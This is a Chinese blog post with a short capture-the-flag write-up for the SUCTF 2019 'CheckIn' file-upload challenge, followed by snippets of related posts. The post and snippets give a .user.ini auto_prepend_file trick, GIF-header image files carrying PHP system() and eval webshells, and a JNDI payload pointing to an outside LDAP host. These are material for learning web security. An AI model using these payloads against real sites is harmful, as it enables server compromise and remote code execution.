[SUCTF 2019]CheckIn

于 2024-09-12 08:30:00 发布
阅读量188 收藏
点赞数 2
文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75556700/article/details/142148485
版权

1、文件上传题

2、先上传.user.ini,抓包,然后放包

.user.ini内容为:

GIF89a                  
auto_prepend_file=test.jpg

3、接着上传test.jpg,抓包,放包

test.jpg内容:

GIF89a? <script language="php">system('cat /flag');</script>

4、访问网址:uploads/065831472858248584ff4993846d5065/index.php(抓包,看响应)

不拿flag不改名
关注
[SUCTF 2019]CheckIn 1(详解)
qq_52843575的博客
12-12 6294
1.基础检测 进入页面是一个简单文件上传界面,正常上传文件,发现上传空内容的jpg文件显示(exif_imagetype:not image!),可知有内容检测,上传代码文件也发现后缀名过滤 开始抓包操作,因为后缀名验证,伪造文件属性也失效了,与此同时发现“?”被过滤了简单利用 2.解题关键 这道题解题关键在于怎样突破后缀名绕过,就得利用.user.ini文件留后门了 user.ini留后门原理 简单来说,就是利于.user.ini指定文件,在其当前目录下的文件执行时会将你指定的文件中的代码执行出
[SUCTF 2019] web题-CheckIn
BROTHERYY的博客
07-07 554
复现环境:buuoj.cn 尝试了各种上传绕过的方法,但依然还是不行,看了下其他大佬的wp,茅塞顿开,也说明我太菜了。 写入保存将ctf.txt改为ctf.jpg auto_prepend_file 表示在php程序加载应用程序前加载指定的php文件 auto_append_file 表示在php代码执行完毕后加载指定的php文件 自定义的.user,ini先执行auto_prepend_file函数,auto_prepend_file 表示在php程序加载应用程序前加载指定的php文件,也就是先加
[SUCTF 2019]Upload Labs 2 phar+Soapclient结合
a3320315的博客
02-02 2360
0x01 源码 // admin.php <?php include 'config.php'; class Ad{ public $cmd; public $clazz; public $func1; public $func2; public $func3; public $instance; public $arg1; ...
SUCTF_2019_部分复现
Lethe's Blog
09-01 5178
Web1 CheckIn 1、进入题目后是一个简单的上传页面: 先尝试上传普通的图片马,发现会显示<? in contents!,过滤了<?,可以使用<script language='php'></scrip>绕过。 修改后再次上传发现显示exif_imagetype:not image!,还用了exif_imagetype()进行检验,可以加上GIF89a...
【BUUCTF】[SUCTF 2019]CheckIn
aoao331198的博客
04-09 512
废话不多讲,老生常谈的文件上传题目 需要传一个图片马 GIF89a <script language='php'>@eval($_POST['abc']);</script> 还有一个.user.ini文件 文件上传之.user.ini GIF89a auto_prepend_file=upload.jpg 作用是指定在主文件之前自动解析的文件的名称,并包含该文件,就像使用require函数调用它一样。 蚁剑链接 http://c8a6d5ca-0f52-4c27-a06f-
upload-labs关卡2(基于白名单MIME绕过)通关思路
zyh1588的博客
11-03 468
小白回顾upload-labs关卡2基于白名单MIME验证绕过
[SUCTF 2019]CheckIn+[WUSTCTF2020]CV Maker
硫酸超的博客
12-07 690
[SUCTF 2019]CheckIn 源码: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"
SUCTF 2019 CheckIn 作题有感
qq_46184013的博客
04-15 662
一.SUCTF 2019 CheckIn 刚开始打开这道题以为只是一道普通的文件上传, 先是试了试php一句话木马,提示 这里显示 是对<?进行过滤了 这时候想到可以换一种方法,用 <script language='php'>system('cat /flag');</script>对<?进行替换。 但发现还是不行,出现这个界面。 我是小白也不懂这个啊,去...
SUCTF web CheckIn
weixin_42499640的博客
08-19 2744
记录一道SUCTF的web1 据菠萝师傅说这是他们出的签到题 我tcl
buuctf web 13、[SUCTF 2019]CheckIn
m0_46412682的博客
07-16 1102
buuctf web 13、[SUCTF 2019]CheckIn 开始的页面 1、 先上传一个正常的照片 2、再上传一个php文件,提示illegal suffix 3、上传一个只含一句话木马的后缀为gif的文件,提示内容中有<? 既然过滤了<? ,所以用 4、上传7.gif,但是提示不是gif类型,exif_imagetype是文件内容的头部看是否是对应的照片类型 我们只需要再文件中填写对应的照片头部 上传成功 5、但是要怎么样才能让照片木马执行,我们想到.htaccess
结合suctf-upload labs-RougeMysql再学习
weixin_30376453的博客
08-22 173
这篇主要记录一下这道题目的预期解法 做这道题首先要在自己的vps搭建一个rouge mysql,里面要填写需要读取客户端的文件名,即我们上传的phar文件路径 先搭一个rouge mysql测试看看: #coding=utf-8#python2.x import socket import logging logging.basicConfig(level=loggin...
buu-day10
anwen12的博客
01-27 2223
0x01 [红明谷CTF 2021]JavaWeb /;/json绕过权限校验,然后漏洞探测 ["java.net.InetAddress","khl16k.dnslog.cn"] ["br.com.anteros.dbcp.AnterosDBCPConfig", {"healthCheckRegistry": "ldap://8.142.93.103:9090/test"}] ["ch.qos.logback.core.db.JNDIConnectionSource",{"jndiLocation"
Buuctf-[极客大挑战 2019]Upload
m0_63563528的博客
04-20 285
还是不行,出现上面这个提示,说明它还检测了我的文件头是不是jpg。一般我们可以用几何画板随便做一张图片,然后在图片中插入一句话木马,这里我为什么不用呢?因为图片中容易存在<?这个字段而被过滤掉。诶这里发现它还有检测,检查到我的内容有<?,又被拦截了,上网查了一下。
SUCTF2019 web部分赛题复盘
stepone4ward的博客
09-09 1409
CheckIn 一道文件上传的题目,首先尝试上传最简单的一句话木马shell.php 后缀被检测,尝试上传一个txt文件 在php手册中查找一下exif_imagetype函数 也就是说他会检测我们上传文件的签名。 我们在上传包含最简单的一句话木马的图片马,提示<?被检测,修改一句话木马为<script language='php'> @eval($_POST['cmd']...
upload-labs 02(文件类型)
LuckySec
11-02 332
题目 尝试上传php文件,结果失败 查看源码,发现对上传的文件类型进行了限制 使用bp工具截取上传文件 如图标记处,将此处改成Content-Type:image/jpeg 然后点击Forward继续上传 查看本地网页根目录下的上传文件夹中,是否存在php文件 文件上传成功! ...
SoapClient反序列化SSRF
蚁景网安学院
09-02 1494
序列化中的魔术方法https://www.php.net/manual/zh/language.oop5.magic.phpconstruct(), destruct(), call()...
php反序列化拓展攻击详解
BerL1n
01-27 891
2019-11-11 16:51 文章首发于先知社区:https://xz.aliyun.com/t/6699 前言 继上篇对thinkphp5版本反序列化pop链详细分析后,对tp的反序列化漏洞有了初步了解,但是其实无论挖掘的pop链有多么的完美,最终还是避免不了要有关键的触发点,否则将一无是处,比如常见的就是反序列化函数 unserialize() ,绝大多数都是靠unserialize函数,反序列化对象触发漏洞。但是在tp框架或者其他框架以及后期开发越来越安全的情况下我们很难再找到这样的触发点。最近也
SUCTF_2019部分题解复现
weixin_44255856的博客
08-19 1497
本次比赛还是太菜了,只写出了两道题。但是学习到了很多东西。 web check 题目是一个文件上传,但是限制了很多地方,限制了文件类型,并且判断了文件上传的文件内容,这里是使用exif_image判断的。可以通过手动添加GIF89,也可以在文件头加上width和height 这里在前面添加 #define width 1337 #define height 1337 auto_prepend...
2021gkctf checkin
最新发布
02-29
2021gkctf checkin 是一个CTF(Capture The Flag)比赛,是由GKSEC团队举办的。CTF比赛是一种网络安全竞赛,旨在测试参赛者在网络安全领域的技能和知识。 在2021gkctf checkin中,参赛者需要完成一系列的网络安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值